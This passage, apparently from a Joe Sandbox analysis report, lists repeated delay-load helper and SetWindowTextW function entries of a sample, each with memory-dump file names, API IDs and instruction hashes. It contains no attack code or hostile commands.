                                                                                • Part of subcall function 00DE2160: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DE21E4
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1890085406.0000000000DC1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00DC0000, based on PE: true
                                                                              • Associated: 00000008.00000002.1890064100.0000000000DC0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890126915.0000000000DFB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E08000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E0C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890221221.0000000000E14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_dc0000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                              • String ID:
                                                                              • API String ID: 1269201914-0
                                                                              • Opcode ID: cc3c6a839b4c6d308580d5fe402a1193d9a1181652c3b1d97c10afbacf43efcf
                                                                              • Instruction ID: 48607e26c81eed2007d6c9348d26cac8eea75918494d61b895a622732992c647
                                                                              • Opcode Fuzzy Hash: cc3c6a839b4c6d308580d5fe402a1193d9a1181652c3b1d97c10afbacf43efcf
                                                                              • Instruction Fuzzy Hash: 09B012EA35A740FC314471076C0BC3F015CD0C0F11370922FF400D01C0D4804CC10131
                                                                              Function 00DE1B1E Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00DE1AE3
                                                                                • Part of subcall function 00DE2160: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DE21D3
                                                                                • Part of subcall function 00DE2160: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DE21E4
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1890085406.0000000000DC1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00DC0000, based on PE: true
                                                                              • Associated: 00000008.00000002.1890064100.0000000000DC0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890126915.0000000000DFB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E08000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E0C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890221221.0000000000E14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_dc0000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                              • String ID:
                                                                              • API String ID: 1269201914-0
                                                                              • Opcode ID: 32eb636321eb1e78a3692467b849d5c1601899e1136b40a1e649749dbd551d45
                                                                              • Instruction ID: 4c1beb881cbe5ec7aab4efd395577dcd98b955b2c0aed5921d168243415296f3
                                                                              • Opcode Fuzzy Hash: 32eb636321eb1e78a3692467b849d5c1601899e1136b40a1e649749dbd551d45
                                                                              • Instruction Fuzzy Hash: 09B092AA35A644AC61446106680A83B011CD0C0B10360912AB400D1180948049C10131
                                                                              Function 00DE1B14 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00DE1AE3
                                                                                • Part of subcall function 00DE2160: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DE21D3
                                                                                • Part of subcall function 00DE2160: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DE21E4
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1890085406.0000000000DC1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00DC0000, based on PE: true
                                                                              • Associated: 00000008.00000002.1890064100.0000000000DC0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890126915.0000000000DFB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E08000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E0C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890221221.0000000000E14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_dc0000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                              • String ID:
                                                                              • API String ID: 1269201914-0
                                                                              • Opcode ID: d40c1f6ddfd84ef19d1013e57cb6b04643671015a5d7324633862711cac6ac35
                                                                              • Instruction ID: a1e9d4f41333f9c34abce475f4be91f3c3121d174aad746cfb6024a376bdb7bc
                                                                              • Opcode Fuzzy Hash: d40c1f6ddfd84ef19d1013e57cb6b04643671015a5d7324633862711cac6ac35
                                                                              • Instruction Fuzzy Hash: AEB092AA35A644AC61046146680A83B015CD0C1B10360902AB400D1180A48049C10131
                                                                              Function 00DE1B0A Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00DE1AE3
                                                                                • Part of subcall function 00DE2160: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DE21D3
                                                                                • Part of subcall function 00DE2160: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DE21E4
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1890085406.0000000000DC1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00DC0000, based on PE: true
                                                                              • Associated: 00000008.00000002.1890064100.0000000000DC0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890126915.0000000000DFB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E08000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E0C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890221221.0000000000E14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_dc0000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                              • String ID:
                                                                              • API String ID: 1269201914-0
                                                                              • Opcode ID: 835223bbe3a9333491b49e978076c1b5c1c0212ad98c55f1bb297ab7f05267e6
                                                                              • Instruction ID: bf75b6446f8c3f6dfc6de47451dba8caa3214e4822bfbcbfacb3f3df69868acf
                                                                              • Opcode Fuzzy Hash: 835223bbe3a9333491b49e978076c1b5c1c0212ad98c55f1bb297ab7f05267e6
                                                                              • Instruction Fuzzy Hash: 76B092EA39A640AC21046106690A97B011CD0C1B10360902AB000D4280949049CA0131
                                                                              Function 00DE1B00 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00DE1AE3
                                                                                • Part of subcall function 00DE2160: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DE21D3
                                                                                • Part of subcall function 00DE2160: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DE21E4
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1890085406.0000000000DC1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00DC0000, based on PE: true
                                                                              • Associated: 00000008.00000002.1890064100.0000000000DC0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890126915.0000000000DFB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E08000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E0C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890221221.0000000000E14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_dc0000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                              • String ID:
                                                                              • API String ID: 1269201914-0
                                                                              • Opcode ID: 052f9e0df220b4aa30d4b023a528dd048d1b4f268d616d5c693b48d34abede02
                                                                              • Instruction ID: dd171c7a5cd39e838402b1edd220f906c0e83997f154ee009744b0ff5688e40b
                                                                              • Opcode Fuzzy Hash: 052f9e0df220b4aa30d4b023a528dd048d1b4f268d616d5c693b48d34abede02
                                                                              • Instruction Fuzzy Hash: D4B092EA35A680AC21446106680A87B011CD0C1B10360912AB400D4280948048C50131
                                                                              Function 00DE1B32 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00DE1AE3
                                                                                • Part of subcall function 00DE2160: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DE21D3
                                                                                • Part of subcall function 00DE2160: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DE21E4
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1890085406.0000000000DC1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00DC0000, based on PE: true
                                                                              • Associated: 00000008.00000002.1890064100.0000000000DC0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890126915.0000000000DFB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E08000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E0C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890221221.0000000000E14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_dc0000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                              • String ID:
                                                                              • API String ID: 1269201914-0
                                                                              • Opcode ID: 7c97dc00c98e9517e3ef52933007840487edb7c656fee871e58c875e333c57dc
                                                                              • Instruction ID: 8044267674167161449ccbebd67bd0c32c9760acad067c07651584b0e15c6b34
                                                                              • Opcode Fuzzy Hash: 7c97dc00c98e9517e3ef52933007840487edb7c656fee871e58c875e333c57dc
                                                                              • Instruction Fuzzy Hash: 99B092EA35A644AC71046107680A83B011CE0C0B10360902AB000D1180948049C10131
                                                                              Function 00DE1B28 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00DE1AE3
                                                                                • Part of subcall function 00DE2160: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DE21D3
                                                                                • Part of subcall function 00DE2160: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DE21E4
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1890085406.0000000000DC1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00DC0000, based on PE: true
                                                                              • Associated: 00000008.00000002.1890064100.0000000000DC0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890126915.0000000000DFB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E08000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E0C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890221221.0000000000E14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_dc0000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                              • String ID:
                                                                              • API String ID: 1269201914-0
                                                                              • Opcode ID: 5dae96dcff030811ba3e041dac50e7df8d1316c3b2ad5b56d73cdd7a48f85f44
                                                                              • Instruction ID: 9f4c8bceeb3c0e03607f1843a839239b2e04412d2c1a68d91530ca6f6122f842
                                                                              • Opcode Fuzzy Hash: 5dae96dcff030811ba3e041dac50e7df8d1316c3b2ad5b56d73cdd7a48f85f44
                                                                              • Instruction Fuzzy Hash: 09B092AA39A644AC61046106690A83B011CD0C0B10360902AB000D1180D4804AC20131
                                                                              Function 00DE1D4B Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00DE1CFC
                                                                                • Part of subcall function 00DE2160: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DE21D3
                                                                                • Part of subcall function 00DE2160: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DE21E4
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1890085406.0000000000DC1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00DC0000, based on PE: true
                                                                              • Associated: 00000008.00000002.1890064100.0000000000DC0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890126915.0000000000DFB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E08000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E0C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890221221.0000000000E14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_dc0000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                              • String ID:
                                                                              • API String ID: 1269201914-0
                                                                              • Opcode ID: 9c3034ecd6f9f3b28f3112da8b20b6a2393d05e5b6a39337c50a48df6af51d02
                                                                              • Instruction ID: 0d4788ca3680cd2be3e09bd0d6695b653855e79ef003385a9f656b6ec8f8dd6d
                                                                              • Opcode Fuzzy Hash: 9c3034ecd6f9f3b28f3112da8b20b6a2393d05e5b6a39337c50a48df6af51d02
                                                                              • Instruction Fuzzy Hash: E4B012E639D240EC310471475C0BCBB014CC0C8F10370D11FFA00D41C0D4804C840032
                                                                              Function 00DE1D37 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00DE1CFC
                                                                                • Part of subcall function 00DE2160: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DE21D3
                                                                                • Part of subcall function 00DE2160: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DE21E4
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1890085406.0000000000DC1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00DC0000, based on PE: true
                                                                              • Associated: 00000008.00000002.1890064100.0000000000DC0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890126915.0000000000DFB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E08000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E0C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890221221.0000000000E14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_dc0000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                              • String ID:
                                                                              • API String ID: 1269201914-0
                                                                              • Opcode ID: 81060ce3cd54fc4fda09cc6c197a56876bcaff63e06e85df47051e259211361b
                                                                              • Instruction ID: e642ba5970ed6e5276b903e554d8833a9d95de5b7470fb7a9f3bed0661c07b62
                                                                              • Opcode Fuzzy Hash: 81060ce3cd54fc4fda09cc6c197a56876bcaff63e06e85df47051e259211361b
                                                                              • Instruction Fuzzy Hash: E5B012E6399240EC310471075D0BDFB014CC0C8F10370D02FF700D41C0D4804C890032
                                                                              Function 00DE1E10 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00DE1E22
                                                                                • Part of subcall function 00DE2160: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DE21D3
                                                                                • Part of subcall function 00DE2160: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DE21E4
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1890085406.0000000000DC1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00DC0000, based on PE: true
                                                                              • Associated: 00000008.00000002.1890064100.0000000000DC0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890126915.0000000000DFB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E08000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E0C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890221221.0000000000E14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_dc0000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                              • String ID:
                                                                              • API String ID: 1269201914-0
                                                                              • Opcode ID: 9808a81ebce1c080642b45ff797edf61a1790de028285bab9d59567170aa83c5
                                                                              • Instruction ID: 261b831739a2de56ef29676c0fdea2b9a3963c0af1bf5a2c95f9606dde8b9b6f
                                                                              • Opcode Fuzzy Hash: 9808a81ebce1c080642b45ff797edf61a1790de028285bab9d59567170aa83c5
                                                                              • Instruction Fuzzy Hash: FAB012E6358280BD71047113AC0BC3B010CE1C0F11370502FF543F00C294804CC40036
                                                                              Function 00DE1E2B Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00DE1E22
                                                                                • Part of subcall function 00DE2160: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DE21D3
                                                                                • Part of subcall function 00DE2160: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DE21E4
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1890085406.0000000000DC1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00DC0000, based on PE: true
                                                                              • Associated: 00000008.00000002.1890064100.0000000000DC0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890126915.0000000000DFB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E08000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E0C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890221221.0000000000E14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_dc0000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                              • String ID:
                                                                              • API String ID: 1269201914-0
                                                                              • Opcode ID: 4f632667d73d923e3a322d8af59146289c8986e49250c26dda75126c2aa2c5b4
                                                                              • Instruction ID: 074e859e72415936df138a9690fac59584bdac5bbafa0e22e5390488e8568fba
                                                                              • Opcode Fuzzy Hash: 4f632667d73d923e3a322d8af59146289c8986e49250c26dda75126c2aa2c5b4
                                                                              • Instruction Fuzzy Hash: 83B092A6358281AD220461066D0A83B010CC1C4F10360511AB501E1181948049C40132
                                                                              Function 00DC22AA Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SetWindowTextW.USER32(?,00000000), ref: 00DC22B6
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1890085406.0000000000DC1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00DC0000, based on PE: true
                                                                              • Associated: 00000008.00000002.1890064100.0000000000DC0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890126915.0000000000DFB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E08000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E0C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890221221.0000000000E14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_dc0000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: TextWindow
                                                                              • String ID:
                                                                              • API String ID: 530164218-0
                                                                              • Opcode ID: c088daa7f43b8bcca896bc2e83280d488c1df47fdb51cacad2a2843de4ee1eda
                                                                              • Instruction ID: d830da60e8149a7701b267e98abdaec3511cb8a204205974ca69c2468de4f1ff
                                                                              • Opcode Fuzzy Hash: c088daa7f43b8bcca896bc2e83280d488c1df47fdb51cacad2a2843de4ee1eda
                                                                              • Instruction Fuzzy Hash: 17B0127921A0306B8B1837683C15CFE718ECF9B31030A809AB401E3286CF640C4101F8
                                                                              Function 00DE1B9B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00DE1AE3
                                                                                • Part of subcall function 00DE2160: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DE21D3
                                                                                • Part of subcall function 00DE2160: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DE21E4
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1890085406.0000000000DC1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00DC0000, based on PE: true
                                                                              • Associated: 00000008.00000002.1890064100.0000000000DC0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890126915.0000000000DFB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E08000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E0C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890221221.0000000000E14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_dc0000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                              • String ID:
                                                                              • API String ID: 1269201914-0
                                                                              • Opcode ID: be2ee878ad41cf1bc96a06d0e7fd029f42dbcfce37ffe2ed6018d0d9a587b45d
                                                                              • Instruction ID: 27330c3f52ff0824f822642053f1ff33ad4f9bed7225a64d52afde3c5bbb0dd1
                                                                              • Opcode Fuzzy Hash: be2ee878ad41cf1bc96a06d0e7fd029f42dbcfce37ffe2ed6018d0d9a587b45d
                                                                              • Instruction Fuzzy Hash: 23A001AA3AAA86FC71187253AD0AC3F022CE4C5F653B0992EF54294081A89059861535
                                                                              Function 00DE1BA5 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00DE1AE3
                                                                                • Part of subcall function 00DE2160: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DE21D3
                                                                                • Part of subcall function 00DE2160: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DE21E4
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1890085406.0000000000DC1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00DC0000, based on PE: true
                                                                              • Associated: 00000008.00000002.1890064100.0000000000DC0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890126915.0000000000DFB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E08000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E0C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890221221.0000000000E14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_dc0000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                              • String ID:
                                                                              • API String ID: 1269201914-0
                                                                              • Opcode ID: e4e5a79e13f0c9977e58ca3c20a4f3031ac1ac9447d9b6cc863093eb675c6423
                                                                              • Instruction ID: 27330c3f52ff0824f822642053f1ff33ad4f9bed7225a64d52afde3c5bbb0dd1
                                                                              • Opcode Fuzzy Hash: e4e5a79e13f0c9977e58ca3c20a4f3031ac1ac9447d9b6cc863093eb675c6423
                                                                              • Instruction Fuzzy Hash: 23A001AA3AAA86FC71187253AD0AC3F022CE4C5F653B0992EF54294081A89059861535
                                                                              Function 00DE1B5F Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00DE1AE3
                                                                                • Part of subcall function 00DE2160: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DE21D3
                                                                                • Part of subcall function 00DE2160: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DE21E4
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1890085406.0000000000DC1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00DC0000, based on PE: true
                                                                              • Associated: 00000008.00000002.1890064100.0000000000DC0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890126915.0000000000DFB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E08000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E0C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890221221.0000000000E14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_dc0000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                              • String ID:
                                                                              • API String ID: 1269201914-0
                                                                              • Opcode ID: 3d5186041f66c2a5541416a154e0bf30a629ae71a4f57a7af0f24591571747e4
                                                                              • Instruction ID: 27330c3f52ff0824f822642053f1ff33ad4f9bed7225a64d52afde3c5bbb0dd1
                                                                              • Opcode Fuzzy Hash: 3d5186041f66c2a5541416a154e0bf30a629ae71a4f57a7af0f24591571747e4
                                                                              • Instruction Fuzzy Hash: 23A001AA3AAA86FC71187253AD0AC3F022CE4C5F653B0992EF54294081A89059861535
                                                                              Function 00DE1B41 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00DE1AE3
                                                                                • Part of subcall function 00DE2160: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DE21D3
                                                                                • Part of subcall function 00DE2160: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DE21E4
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1890085406.0000000000DC1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00DC0000, based on PE: true
                                                                              • Associated: 00000008.00000002.1890064100.0000000000DC0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890126915.0000000000DFB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E08000.00000004.00000001.01000000.0000000F.sdmpDownload File
